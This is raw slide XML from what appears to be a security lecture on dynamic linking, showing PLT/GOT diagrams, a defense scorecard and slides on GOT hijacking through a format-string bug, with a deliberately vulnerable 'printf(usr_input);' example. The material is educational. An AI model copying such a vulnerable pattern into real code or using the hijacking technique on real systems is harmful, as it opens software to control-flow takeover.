              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4029126" y="2835446"/>
            <a:ext cx="4423279" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>GOT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>dynamic_printf_addr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="87589" y="2622736"/>
            <a:ext cx="2974389" cy="364981"/>
            <a:chOff x="87589" y="2111771"/>
            <a:chExt cx="2974389" cy="364981"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="2111771"/>
              <a:ext cx="2604778" cy="364981"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent6">
                <a:lumMod val="75000"/>
                <a:alpha val="2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ight Arrow 1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="87589" y="2123416"/>
              <a:ext cx="291966" cy="306585"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">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Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21349956">
            <a:off x="3065642" y="2145318"/>
            <a:ext cx="861298" cy="132167"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">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457200" y="5469717"/>
            <a:ext cx="4423279" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>dynamic_printf_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&gt;:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5036743"/>
            <a:ext cx="4423279" cy="43297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smtClean="0"/>
              <a:t>LIBC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Hexagon 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5883108" y="4394377"/>
            <a:ext cx="2029161" cy="1401529"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst>
              <a:gd name="adj" fmla="val 14584"/>
              <a:gd name="vf" fmla="val 115470"/>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Linker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5430560" y="3363561"/>
            <a:ext cx="2773676" cy="364981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="75000"/>
              <a:alpha val="2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204373" y="3670146"/>
            <a:ext cx="3537439" cy="107461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smtClean="0"/>
              <a:t>Subsequent calls to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>do not require the linker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Right Arrow 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="7495899" flipV="1">
            <a:off x="2843853" y="3848872"/>
            <a:ext cx="3856408" cy="187335"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">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B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="418234733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Defense Scorecard</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34255265"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1737360"/>
          <a:ext cx="8229600" cy="2286000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{FABFCF23-3B69-468F-B69F-88F6DE6A72F2}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2438400"/>
                <a:gridCol w="5791200"/>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>Aspect</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>Defense</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>Performance</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="285750" indent="-285750">
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>Smaller</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> impact is better</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>Deployment</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="285750" indent="-285750">
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Can everyone easily use it?</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>Compatibility</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="285750" indent="-285750">
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>Doesn’t break libraries</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Safety Guarantee</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="285750" indent="-285750">
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" i="0" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Completely secure to easy to bypass</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="148977" y="6297638"/>
            <a:ext cx="8828058" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>* http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>blogs.technet.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/b/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>srd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/archive/2009/03/16/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>gs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-cookie-protection-effectiveness-and-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>limitations.aspx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="59092820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90000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploiting the linking process</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>GOT entries are really function pointers positioned at known addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Idea:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> use other vulnerabilities to take control (e.g., format string)</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50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2769411270"/>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990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GOT Hijacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1819783"/>
            <a:ext cx="2978050" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>usr_input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>(“world\n”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4029126" y="1819783"/>
            <a:ext cx="4423279" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>printf@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> GOT[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>] </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4029126" y="2835446"/>
            <a:ext cx="4423279" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>GOT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>dynamic_linker_addr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2111771"/>
            <a:ext cx="2608440" cy="364981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="75000"/>
              <a:alpha val="2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457200" y="5469717"/>
            <a:ext cx="4423279" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>dynamic_printf_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&gt;:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5036743"/>
            <a:ext cx="4423279" cy="432974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="50000"/>
              <a:alpha val="61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LIBC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Hexagon 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5883108" y="4394377"/>
            <a:ext cx="2029161" cy="1401529"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst>
              <a:gd name="adj" fmla="val 14584"/>
              <a:gd name="vf" fmla="val 115470"/>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Linker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5430560" y="3363561"/>
            <a:ext cx="2773676" cy="364981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
